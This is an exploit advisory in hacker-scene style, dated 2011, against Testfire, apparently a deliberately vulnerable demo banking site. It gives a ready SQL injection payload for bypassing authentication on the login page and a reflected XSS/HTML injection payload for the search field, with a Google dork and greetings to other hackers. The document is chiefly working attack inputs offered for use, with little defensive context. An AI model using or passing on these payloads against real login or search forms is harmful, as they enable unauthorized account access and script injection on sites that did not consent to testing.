Testfire suffers from cross site scripting and remote SQL injection vulnerabilities.
4b3e62267b096cf78ada551e91ef7aa85b23b24c3001df21d2245accace3d05c
%+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%+++++++++++++++++++++++++++++
+++++++++++
# Exploit Title:Testfire Multiple Vulnerabilities
# Vendor: www.testfire.net
# Date: 22nd july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork: Copyright © 2011, Watchfire Corporation
************************************************************
************************************************************
*****************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://demo.testfire.net/bank/login.aspx
EXPLOIT:
Username: ' or 'bug'='bug
Password: ' or 'bug'='bug
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS(&HTML) Vulnerability( search field)
{Demo}: http://demo.testfire.net/search.aspx
Exploit: ">><marquee><h1><b><a href="http://www.google.com
">BUG</a></b></h1></marquee>
************************************************************
************************************************************
*****************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
************************************************************
************************************************************
*****************************************************************